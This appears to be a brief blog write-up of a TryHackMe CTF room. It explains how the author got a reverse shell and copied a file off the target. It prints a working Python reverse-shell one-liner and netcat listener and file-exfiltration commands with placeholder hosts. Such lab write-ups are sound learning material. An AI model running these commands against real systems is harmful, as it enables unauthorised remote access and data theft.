Rev-shell & Netcat file transfer

Recently I was completing the TryHackMe bookshop CTF room and found myself on a very unstable reverse-shell. I couldn’t even stabilise the shell and every time I tried, I ended up hosing the one connection I had. This then required a reset of the target.

When successfully connected, I needed to grab a file from the target machine, but only had limited selection of commands available.

Even fewer commands allowed me to continue using the connection after running them.

I had already tunneled in by executing a Python one-liner on the vulnerable from end (it had a Python CLI):

import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("{ip}",{port})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])

This connected to my local waiting nc listener:

nc -lnvp {port}

This gave me the reverse-shell. Unfortunately no matter what I tried, I could not stabilise it – so had to run with a very flaky connection.

Update – after some research I found a better way to stabilise a reverse shell.

Netcat file transfer

This simple and rather accessible technique was grabbed from the folk over on ironhackers.

Once I was connected, I created a 2nd local nc listener on a 2nd port.

nc -lnvp {port2} > {destinationFilename}

In the reverse shell, I then commanded netcat to stream the file over to my local machine:

nc {local IP} {port2} -w 3 < {sourceFilename}

And that was it. This transferred the file over with no issue.

A quick and easy way to transfer files to/from machines when SSH / SCP / HTTP / FTP etc are all locked down.

Leave a Reply

Your email address will not be published. Required fields are marked *